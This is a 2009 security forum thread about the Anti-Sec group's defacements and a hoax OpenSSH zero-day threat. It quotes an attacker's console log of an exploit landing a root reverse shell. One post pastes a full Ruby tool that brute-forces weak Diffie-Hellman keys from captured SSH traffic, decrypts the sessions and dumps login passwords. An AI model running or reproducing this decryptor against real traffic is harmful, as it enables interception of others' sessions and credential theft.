I found this amusing:
http://seclists.org/fulldisclosure/2009/Jul/0210.html
:cool:
Script-kiddies against script-kiddies...
That's some real 1337 skills there folks. :rolleyes:
Quote:
anti-sec:~/pwn# ./litespeed_0day -t blackhat-forums.com -p80
[+] Connecting to blackhat-forums.com:80
[+] Connected Successfully!
[+] Checking for Lightspeed vulnerability...
[+] Vulnerable!
[+] Sending exploit
[-] Phase 1
[-] Phase 2
[-] Phase 3
[+] Injecting Shellcode...
[+] Waiting for reverse shell...
[~] Connected to shell @ 74.86.203.65!
<snip>
uid=0(root) gid=0 (root) groups=0 (root)
<snip>
I am not of the understanding? I must not be as uber l337 as I thought. Or I can't read.
Why would you even post that?
For the lulz; for victory!
Quote:
Why would you even post that?
Ipse Dixit! :D
Quote:
I am not of the understanding? I must not be as uber l337 as I thought. Or I can't read.
Because this forum happens to be called "Security News", and the fact that a new skiddies-on-the-block group seemingly hell-bent on starting some kind of range war with full-disclosure sites is exactly what the forum title says.
Quote:
Why would you even post that?
That, and the fact that the target site is still down...............which indicates that it is for real and not some hoax BS?
I have noticed that you like the "let me Google that for you" answer...........perhaps you should take a leaf out of your own book and see what furore has been caused on the "darkside", before making non-contributory posts? ;)
It was you, wasn't it .................. :lildevil:
Quote:
For the lulz; for victory!
I didn't take it as him referring to you nihil, but to the anti-sec group... I could be wrong though. :D
Quote:
Quote:
Why would you even post that?
Because this forum happens to be called "Security News", and the fact that a new skiddies-on-the-block group seemingly hell-bent on starting some kind of range war with full-disclosure sites is exactly what the forum title says.
That, and the fact that the target site is still down...............which indicates that it is for real and not some hoax BS?
I have noticed that you like the "let me Google that for you" answer...........perhaps you should take a leaf out of your own book and see what furore has been caused on the "darkside", before making non-contributory posts?
Well,
Let's just say that there are certain members of another site, called the "*******" or somesuch, who delight in causing trouble here.
You will know the most obvious of them because it will be in their signatures ;)
Pax Vobiscum
Greetz.
This Anti-Sec group first made headlines when they successfully pwned ImageShack.
Article at Slashdot:
Quote:
Posted by Soulskill on Saturday July 11, @11:23AM
from the a-picture's-worth-a-couple-hundred-words-or-so dept.
"Last night a group calling themselves 'Anti-Sec' hacked ImageShack, one of the largest image hosting sites on the web, and replaced many of the site's hosted pictures with one of their own, which detailed their manifesto. The group's grievance is against full-disclosure of exploits, an issue that was debated recently after a presentation on an ATM exploit was canceled. Anti-Sec simply wants the practice within security circles to end, and they've promised to cause 'mayhem and destruction' if it doesn't. These people are taking direct aim against a sector of the IT industry that is already armed to fight the ... but they also already know that. It should be interesting to see how this plays out."
And as far as them being "Skiddies"... Well don't count on it... ;)
You're not looking at the big picture.
These people have created forums where the topic of choice is victimising internet users.
What they don't realise is that ddos attacks, spamming, defacements, and general trolling are just the sort of response the internet at large has in return.
Dude don't get your panties in a wad. I should have said "Why would 'THEY' even post that"
It's called sarcasm and was directed at the uber l337 hax0rs post, not your link.
Quote:
And as far as them being "Skiddies"... Well don't count on it...
I don't know about that. Nowadays even botnet servers have point and click CNC.
That's command and control (also sarcasm - but true)
Here's a link for ya Nihil http://www.antionline.com/images/ieimages/2009/07/1.jpg
Looks like they have been around for quite a while. Here is a blog post about them from April of 2006:
http://blog.ncircle.com/archives/200...ement_why.html
Edit:
Actually it looks like they have been around since 1999 or so...
Very true...........if you visit their sites, the content is about showing how uber 31337 you are, rather than any real full-disclosure and analysis.
Quote:
These people have created forums where the topic of choice is victimising internet users.
What they don't realise is that ddos attacks, spamming, defacements, and general trolling are just the sort of response the internet at large has in return.
I notice that blackhat-forums is still offline :D
As for why these people sent the e-mail, that should be perfectly obvious if you think about it?
There are loads of perfectly innocuous reasons why a site goes down or is unavailable................if you have killed a site for some socio-political motive or whatever, you need to advertise that fact.
EDIT:
It seems that they destroyed the Astalavista sites in June 2009:
http://www.ilovebonnie.net/2009/06/0...stacom-hacked/
This is an interesting one from 4 July 2009. That's after they zapped Astalavista and before they defaced Image Shack.
What is strange is that this is a small webservices and webhosting site in New Zealand. The log is here:
http://www.pastebinfail.com/2009/07/...-hack-log.html
The motive given is:
Quote:
- - Why SSANZ?
- Owned by a kid who claims he can manage, secure and audit servers,
- he offers a service that he clearly cannot provide, we are against that.
It worked as can be seen from the website:
http://www.ssanz.net/
Now, I would suggest that if every small service provider were taken to task on what they say and what they do, there would be hundreds of such cases.................but there is only this one?
Totally insignificant by comparison with Image Shack, Astalavista and Blackhat-forums. Also, Image Shack looks like a simple publicity stunt (they did no deliberate damage) and the other two fit their manifesto, so where does SSANZ fit in?
http://www.webhostingtalk.com/showthread.php?t=854441
AND:-
http://ptc-investgations.blogspot.co...ecom-scam.html
Looks like LoganNZ has been p1$$ing people off..........and there are more links on the net to support that ;) eg.
http://www.gpforums.co.nz/showthread...postid=6198073
http://forums.digitalpoint.com/showt...=logan+nz+scam
And maybe he shouldn't have run over his neighbour's cat :lildevil:
Out of all the webservers out there, these people probably deserve it the most. Who cares.
http://archives.neohapsis.com/archiv...9-07/0279.html
:dunce:
Quote:
[Full-disclosure] anti-sec: OpenSSH <= 5.2 zero day exploit code - 48 hours until it is publicly released!
From: Ant-Sec Movement (anti.sec.movement@gmail.com)
Date: Mon Jul 20 2009 - 01:32:18 CDT
Dear Reader,
In 48 hours, the anti-sec movement will publicly unveil working exploit code
and full details for the zero-day OpenSSH vulnerability we discovered. It
will be posted to the Full-Disclosure security list.
Soon, the very foundations of Information Technology and Information
Security will be unearthed as millions upon million of systems running ANY
version of OpenSSH are compromised by wave after wave of script-kiddie and
malicious hacker.
Within 10 hours of the initial release of the OpenSSH 0-day exploit code,
anti-sec will be unleashing powerful computer worm source code with the
ability to auotmatically find and compromise systems running any and all
versions of OpenSSH.
This is an attack against all White Hat Hackers who think that running a
Penetration Test simply searching for known vulnerabilities is all they have
to do in order to receive their payment. Anti-sec will savor the moment when
White Hat Hackers are made to look like fools in the eyes of their clients.
Sincerely,
-anti-sec
I tend to believe these guys more than the average blog/hype/rumor mill
http://isc.sans.org/diary.html?storyid=6742
Yeah...................can I have a bottle of it.....................you seem to have lost a whole 12 days :drink:
Quote:
I tend to believe these guys more than the average blog/hype/rumor mill
And from the trusted guys, who basically admit they don't know what the hell is going down:
Quote:
From: Ant-Sec Movement (anti.sec.movement@gmail.com)
Date: Mon Jul 20 2009 - 01:32:18 CDT
At this point I think that this is a hoax. Clever, but there are distinctive differences between the style of this second missive and the first.
Quote:
OpenSSH Rumors
Published: 2009-07-07,
Last Updated: 2009-07-08 00:08:11 UTC
by Marcus Sachs (Version: 4)
OK they could have been written by a different guy, but the second message certainly tries to ape the first?
I am confused. Are these guys for or against full disclosure? I am getting mixed signals here...
Quote:
This is primarily to
prove that we are serious and committed to our primary goal
- eradicating full-disclosure of computer vulnerabilities and exploits, and
terminating general discussion of hacking for any n00b and script-kiddie to
read and review - and learn from.
And then...
Quote:
We are coming for you hackforums.net...and Milw0rm.com. We haven't forgotten
you, Milw0rm. Our juicy Apache 0-day will terminate both websites, which
will cause a major blow to those who support full-disclosure of hacking
related information.
Wait... what?
Quote:
In 48 hours, the anti-sec movement will publicly unveil working exploit code
and full details for the zero-day OpenSSH vulnerability we discovered. It
will be posted to the Full-Disclosure security list.
12 days? Hell damn near an entire year...
Code:
#!/usr/bin/env ruby
# ssh_decoder
#
# Copyright 2008 Yoann Guillot, Raphaƫl Rigo
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# usage : ./decryptssh.rb [-v] clientserver_stream.dat serverclient_stream.dat (order does not matter)
# use tcpick to create streams from a pcap
# most options are forwarded to ./keygen
require 'optparse'
require 'zlib' # needed for the 'zlib' compression case in Stream#readstream
opts = {:pidrange => '0-0x7fff', :cpus => 1 }
OptionParser.new { |o|
o.on('-n cpus', '--n-cpu cpus') { |i| opts[:cpus] = i.to_i }
o.on('-h num', '--child-pid num') { |i| opts[:child_pid] = i.to_i }
o.on('-p pidrange', '--pid-range pidrange') { |i| opts[:pidrange] = i }
o.on('-s', '--server', '--vulnerable-server') { |i| opts[:client] = false }
o.on('-c', '--client', '--vulnerable-client') { |i| opts[:client] = true }
o.on('-S shared_secret_hex', '--secret shared_secret_hex', '--shared-secret shared_secret_hex') { |i| opts[:shared] = i }
o.on('-v') { $VERBOSE = true }
}.parse!(ARGV)
class Stream
attr_accessor :data, :ptr, :banner, :maclen, :deciphlen, :decipher, :packets, :compr
def initialize(str)
@data = str
@ptr = 0
@maclen = 0
@banner = ''
@packets = []
@decipher = nil
@compr = nil
end
def read(len=@data.length-@ptr)
@ptr += len
@data[@ptr-len, len].to_s
end
def readbanner
@banner = read(@data.index("\n", @ptr)-@ptr+1)
puts @banner if $VERBOSE
@banner
end
def readpacket
ciphlen = CipherBlockSize[@decipher.name] rescue nil if @decipher
ciphlen ||= 16
buf = read(ciphlen)
buf = @decipher.update(buf) if @decipher
p buf if $DEBUG
length = buf.unpack('N').first
if length > 0x10_0000
@decipher.update read(16)
mac = read(@maclen)
@packets << SshPacket.new(buf.length+1, 0.chr+buf, '', mac)
return @packets.last
end
tbuf = read(length + 4 - ciphlen)
tbuf = @decipher.update(tbuf) if @decipher and not tbuf.empty?
buf = buf[4..-1] << tbuf
mac = read(@maclen)
pad = buf.getbyte(0) # padding length byte (works on both ruby 1.8.7 and 1.9+)
payload = buf[1...-pad]
pad = buf[-pad, pad]
case @compr
when 'none'
when 'zlib' then payload = @zlib.inflate(payload)
end
@packets << SshPacket.new(length, payload, pad, mac)
@packets.last
end
def readstream
@zlib = Zlib::Inflate.new if @compr == 'zlib'
nil while @ptr < @data.length and not ['DISCONNECT', 'NEWKEYS'].include? readpacket.type
puts if $VERBOSE
end
def [](type)
return @packets.find { |pkt| pkt.type == type }
end
def to_s
@packets.join(', ')
end
end
class SshPacket
SSH_MSG = {
'DISCONNECT' => 1,
'IGNORE' => 2,
'UNIMPLEMENTED' => 3,
'DEBUG' => 4,
'SERVICE_REQUEST' => 5,
'SERVICE_ACCEPT' => 6,
'KEXINIT' => 20,
'NEWKEYS' => 21,
'DH_GEX_REQUEST_OLD' => 30,
'DH_GEX_GROUP' => 31,
'DH_GEX_INIT' => 32,
'DH_GEX_REPLY' => 33,
'DH_GEX_REQUEST' => 34,
'USERAUTH_REQUEST' => 50,
'USERAUTH_FAILURE' => 51,
'USERAUTH_SUCCESS' => 52,
'USERAUTH_BANNER' => 53,
'CHANNEL_OPEN' => 90,
'CHANNEL_OPEN_CONFIRMATION' => 91,
'CHANNEL_OPEN_FAILURE' => 92,
}
attr_accessor :length, :payload, :pad, :mac, :interpreted, :type
def initialize(length, payload, pad, mac)
@length, @payload, @pad, @mac = length, payload, pad, mac
interpret
end
def bin
[@length].pack('N') << @pad.length << @payload << @pad
end
def to_s
@payload
end
def interpret
ptr = 0
read = proc { |n| ptr += n ; @payload[ptr-n, n].to_s }
readint = proc { read[4].unpack('N').first }
readstr = proc { read[readint[]] }
readstrlist = proc { readstr[].split(',') }
@type = read[1].unpack('C').first
# translate the numeric message code into its symbolic name when we know it
@type = SSH_MSG.key(@type) || @type
case @type
when 'KEXINIT'
@interpreted = { :cookie => read[16],
:kex_algorithms => readstrlist[],
:server_host_key_algorithms => readstrlist[],
:ciph_c2s => readstrlist[],
:ciph_s2c => readstrlist[],
:mac_c2s => readstrlist[],
:mac_s2c => readstrlist[],
:compr_c2s => readstrlist[],
:compr_s2c => readstrlist[],
:lang_c2s => readstrlist[],
:lang_s2c => readstrlist[],
:first_kex_follows => read[1].unpack('C').first,
:reserved => read[4]
}
when 'DH_GEX_INIT'
@interpreted = { :e => readstr[] }
when 'DH_GEX_GROUP'
@interpreted = { :p => readstr[], :g => readstr[] }
when 'DH_GEX_REPLY'
@interpreted = { :key => readkeyblob(readstr[]), :f => readstr[], :sign => readstr[] }
when 'SERVICE_REQUEST', 'SERVICE_ACCEPT'
@interpreted = { :service => readstr[] }
when 'DISCONNECT'
@interpreted = { :reason => readint[], :msg => readstr[], :lang => readstr[] }
when 'USERAUTH_REQUEST'
@interpreted = { :username => readstr[], :nextservice => readstr[], :auth_method => readstr[] }
case @interpreted[:auth_method]
when 'none'
when 'password'
@interpreted[:change] = read[1].unpack('C').first
@interpreted[:password] = readstr[]
when 'publickey'
@interpreted[:testic] = read[1].unpack('C').first
@interpreted[:keytype] = readstr[]
@interpreted[:key] = readkeyblob(readstr[])
else
@interpreted[:data] = read[@payload.length]
end
when 'USERAUTH_FAILURE'
@interpreted = { :meth_allowed => readstr[] }
when 'USERAUTH_SUCCESS'
@interpreted = {}
when 'CHANNEL_DATA'
@interpreted = { :wat => readint[], :data => readstr[] }
if @interpreted[:wat] == 0
@interpreted.delete :wat
p @interpreted[:data] if $VERBOSE
return
end
when 'CHANNEL_CLOSE'
@interpreted = { :foo => readint[] }
else
@interpreted = { :data => read[@payload.length-1] }
end
p @type, @interpreted if $VERBOSE
end
def [](x)
@interpreted[x]
end
end
def readkeyblob(str)
ptr = 0
read = proc { |n| ptr += n ; str[ptr-n, n] }
readstr = proc { read[read[4].unpack('N').first] }
ret = {}
ret[:type] = readstr[]
case ret[:type]
when 'ssh-rsa' then [:e, :n]
when 'ssh-dss' then [:p, :q, :g, :y] # TODO check order
else ret[:unknown] = read[str.length] ; []
end.map { |k| ret[k] = readstr[] }
ret
end
def makekeyblob(key)
key[:type].sbin +
case key[:type]
when 'ssh-rsa' then [:e, :n]
when 'ssh-dss' then [:p, :q, :g, :y]
end.map { |e| key[e].sbin }.join
end
def find_matching_alg(client, server)
client.find { |c| server.include? c }
end
class String
def sbin
[length].pack('N') << self
end
def allhex
self.unpack('H*')
end
end
require 'openssl'
CipherKeySize = {
"none" => 8,
"des" => 8, "3des" => 16, "3des-cbc" => 24,
"blowfish" => 32, "blowfish-cbc" => 16,
"cast128-cbc" => 16,
"arcfour" => 16, "arcfour128" => 16, "arcfour256" => 32,
"aes128-cbc" => 16, "aes192-cbc" => 24, "aes256-cbc" => 32,
"rijndael-cbc@lysator.liu.se" => 32,
"aes128-ctr" => 16, "aes192-ctr" => 24, "aes256-ctr" => 32,
}
CipherBlockSize = {
"none" => 8,
"des" => 8, "3des" => 8, "3des-cbc" => 8,
"blowfish" => 8, "blowfish-cbc" => 8,
"cast128-cbc" => 8,
"arcfour" => 8, "arcfour128" => 8, "arcfour256" => 8,
"aes128-cbc" => 16, "aes192-cbc" => 16, "aes256-cbc" => 16,
"rijndael-cbc@lysator.liu.se" => 16,
"aes128-ctr" => 16, "aes192-ctr" => 16, "aes256-ctr" => 16,
}
class AESCtr
attr_accessor :aes
def initialize(bitsize=128)
@aes = OpenSSL::Cipher.new("aes-#{bitsize}-ecb")
@aes.encrypt
@tmpbuf = ''
end
def update(data)
@tmpbuf << data
ret = ''
while @tmpbuf.length >= 16
buf = @tmpbuf[0, 16]
@tmpbuf = @tmpbuf[16..-1]
ciph = @aes.update(@iv)
increment_counter
ret << buf.unpack('C*').zip(ciph.unpack('C*')).map { |a, b| a^b }.pack('C*')
end
ret
end
def increment_counter
# big-endian increment of the 16-byte counter block (RFC 4344 CTR mode)
15.downto(0) { |i|
if @iv.getbyte(i) == 255
@iv.setbyte(i, 0)
else
@iv.setbyte(i, @iv.getbyte(i) + 1)
break
end
}
end
def iv=(iv) @iv = iv[0, 16] end
def iv ; @iv end
def decrypt ; end
def encrypt ; end
def method_missing(*a)
@aes.send(*a)
end
end
# open the streams
stream1 = Stream.new File.open(ARGV.shift, 'rb') { |fd| fd.read }
stream2 = Stream.new File.open(ARGV.shift, 'rb') { |fd| fd.read }
# read the streams
puts " * read handshake"
abort '1st file has no SSH banner' if stream1.readbanner[0, 4] != 'SSH-'
stream1.readstream
abort '2nd file has no SSH banner' if stream2.readbanner[0, 4] != 'SSH-'
stream2.readstream
# TODO : detect vulnerable OpenSSH versions based on banners
# identify client/server
# TODO : handle shitty clients/servers like dropbear which do not use GEX
# but instead use predefined groups
cs = [stream1, stream2].find { |stream| stream['DH_GEX_INIT' ] }
ss = [stream1, stream2].find { |stream| stream['DH_GEX_REPLY'] }
# determine algorithms
kex_c = cs['KEXINIT']
kex_s = ss['KEXINIT']
cipher = find_matching_alg(cs['KEXINIT'][ :ciph_c2s], ss['KEXINIT'][ :ciph_s2c])
mac = find_matching_alg(cs['KEXINIT'][ :mac_c2s], ss['KEXINIT'][ :mac_s2c])
compr = find_matching_alg(cs['KEXINIT'][:compr_c2s], ss['KEXINIT'][:compr_s2c])
# for kex_hash get the last part of the algorithm names
kex_hash = find_matching_alg(cs['KEXINIT'][:kex_algorithms], ss['KEXINIT'][:kex_algorithms]).split('-').last
puts "cipher: #{cipher}, mac: #{mac}, kex_hash: #{kex_hash}, compr: #{compr}"
puts " * bruteforce DH"
groupinfo = ss['DH_GEX_GROUP']
gex_reply = ss['DH_GEX_REPLY']
gex_init = cs['DH_GEX_INIT']
needed_bits = CipherKeySize[cipher] * 8 * 2
if opts[:client]
weak_key = gex_init[:e].allhex
other_key = gex_reply[:f].allhex
else
other_key = gex_init[:e].allhex
weak_key = gex_reply[:f].allhex
end
if opts[:shared]
shared_secret = opts[:shared]
else
args = { 'b' => needed_bits, 'p' => opts[:pidrange], (opts[:client] ? 'c' : 's') => '',
'G' => groupinfo[:g].allhex, 'P' => groupinfo[:p].allhex,
'k' => weak_key, 'K' => other_key, 'n' => opts[:cpus]}
if not opts[:client]
args.update 'r' => gex_reply[:key][:n].allhex if gex_reply[:key][:n]
args.update 'h' => opts[:child_pid] if opts[:child_pid]
end
commandline = "./keygen " + args.sort.map { |k, v| "-#{k} #{v}" }.join(' ')
puts commandline if $VERBOSE
ENV['ENVIRON'] = "ubuntu-7.04-x86-patched" if not ENV['ENVIRON']
bruteforce_out = `LD_LIBRARY_PATH=$PWD/$ENVIRON/ LD_PRELOAD=$PWD/$ENVIRON/fakepid.so $PWD/$ENVIRON/ld-linux.so.2 #{commandline}`
puts bruteforce_out if $VERBOSE
abort "Bruteforce failed" if not $?.exited? or $?.exitstatus != 0
shared_secret = bruteforce_out.split("\n")[-2]
shared_secret = '00' + shared_secret if shared_secret[0, 1].to_i(16) >= 8
end
puts "DH shared secret : " + shared_secret
puts " * derive keys"
dh_size_request = (cs['DH_GEX_REQUEST'] || cs['DH_GEX_REQUEST_OLD']).payload[1..-1]
blob = [cs.banner.chomp, ss.banner.chomp, cs['KEXINIT'].payload, ss['KEXINIT'].payload,
makekeyblob(gex_reply[:key])].map { |e| e.sbin }.join + dh_size_request +
[groupinfo[:p], groupinfo[:g], gex_init[:e], gex_reply[:f], [shared_secret].pack('H*')].map { |e| e.sbin }.join
puts blob.allhex.first.scan(/.{0,32}/) if $DEBUG
handshake_hash = OpenSSL::Digest.digest(kex_hash, blob).allhex.first
puts "handshake hash : " + handshake_hash if $VERBOSE
we_need = CipherKeySize[cipher]
session_id = handshake_hash
derived = ['A', 'B', 'C', 'D', 'E', 'F'].map { |let|
k_h = [shared_secret.length/2, shared_secret].pack('NH*') + [handshake_hash].pack('H*')
key = OpenSSL::Digest.digest(kex_hash, k_h + let + [session_id].pack('H*'))
# Derive a longer key if needed
while key.length < we_need
key << OpenSSL::Digest.digest(kex_hash, k_h+key)
end
key[0, we_need]
}
puts 'derived keys : ', derived.map { |k| k.allhex } if $VERBOSE
puts ' * decipher streams'
cipher = OpenSSL::Cipher.ciphers.find { |cp| cp.gsub('-', '').downcase == cipher.gsub('-', '').downcase } || cipher # 'aes128-cbc' => 'aes-128-cbc'
puts "Cipher : #{cipher}" if $VERBOSE
case cipher
when /aes(\d+)-ctr/i
bitsize = $1.to_i
c2s = AESCtr.new bitsize
s2c = AESCtr.new bitsize
else
c2s = OpenSSL::Cipher.new(cipher)
s2c = OpenSSL::Cipher.new(cipher)
c2s.decrypt
s2c.decrypt
end
c2s.padding = 0
c2s.iv = derived[0]
c2s.key = derived[2]
cs.decipher = c2s
cs.compr = compr
s2c.padding = 0
s2c.iv = derived[1]
s2c.key = derived[3]
ss.decipher = s2c
ss.compr = compr
case mac
when 'hmac-md5'
cs.maclen = ss.maclen = 16
when 'hmac-sha1'
cs.maclen = ss.maclen = 20
else
raise 'unsupported HMAC'
end
cs.readstream
ss.readstream
# dump credentials
if ss['USERAUTH_SUCCESS']
puts ' * successful authentication packet'
auth = cs.packets.find_all { |p| p.type == 'USERAUTH_REQUEST' }.last
begin
require 'pp'
pp auth.interpreted
rescue LoadError
p auth.interpreted
end
end
# dump streams
i = 0
i += 1 while File.exist?(cfile = "sshdecrypt.#{i}.client.dat") or File.exist?(sfile = "sshdecrypt.#{i}.server.dat")
File.open(cfile, 'wb') { |fd| cs.packets.each { |p| fd.write p.payload } }
File.open(sfile, 'wb') { |fd| ss.packets.each { |p| fd.write p.payload } }
puts " * deciphered streams saved to #{cfile.inspect} & #{sfile.inspect}"
That is one of the inconsistencies that makes me suspect that the second manifesto is a hoax. Also:
Quote:
I am confused. Are these guys for or against full disclosure. I am getting mixed signals here...
I am pretty sure that was not written by the same person as the first manifesto.
Quote:
From: Ant-Sec Movement (anti.sec.movement@gmail.com)
Date: Mon, Jul 20 2009 - 01:32:18 CDT
Different format & timezone.....looks like Australia or the USA? at +10 hours the first one should be Australia.
Dear Reader,
************************************* Missing space
In 48 hours, the Anti-Sec movement will publicly unveil working exploit code
and full details for (of) the zero-day OpenSSH vulnerability we discovered. It will be posted to the Full-Disclosure security list. Capitalisation, grammar & punctuation
Soon, the very foundations of Information Technology and Information
Security will be unearthed, as millions upon million of systems running ANY
version of OpenSSH are compromised by wave after wave of script-kiddies and malicious hackers. Plurals & punctuation
Within 10 hours of the initial release of the OpenSSH 0-day exploit code,
Anti-Sec will be unleashing powerful computer worm source code with the
ability to auotmatically find and compromise systems running any and all
versions of OpenSSH. Capitalisation typo, phrase is wrong way round
This is an attack against all White Hat Hackers who think that running a
penetration test simply searching for known vulnerabilities is all they have
to do in order to receive their payment. Anti-Sec will savor the moment when White Hat Hackers are made to look like fools in the eyes of their clients. Incorrect capitalisation, missing capitalisation
Sincerely,
-anti-sec
Looks like it was a hoax just like I thought:
http://www.theregister.co.uk/2009/07/20/anti_sec_spoof/
:)
Quote:
Pranksters have latched onto Anti-Sec's quixotic crusade against full disclosure of security vulnerabilities by impersonating the group in a threat to unleash an OpenSSH exploit.
EDIT: I now think that the first post was also a hoax from the same group, but by another person.
My feeling is that both posts were from Asian students at an Australian university. ;)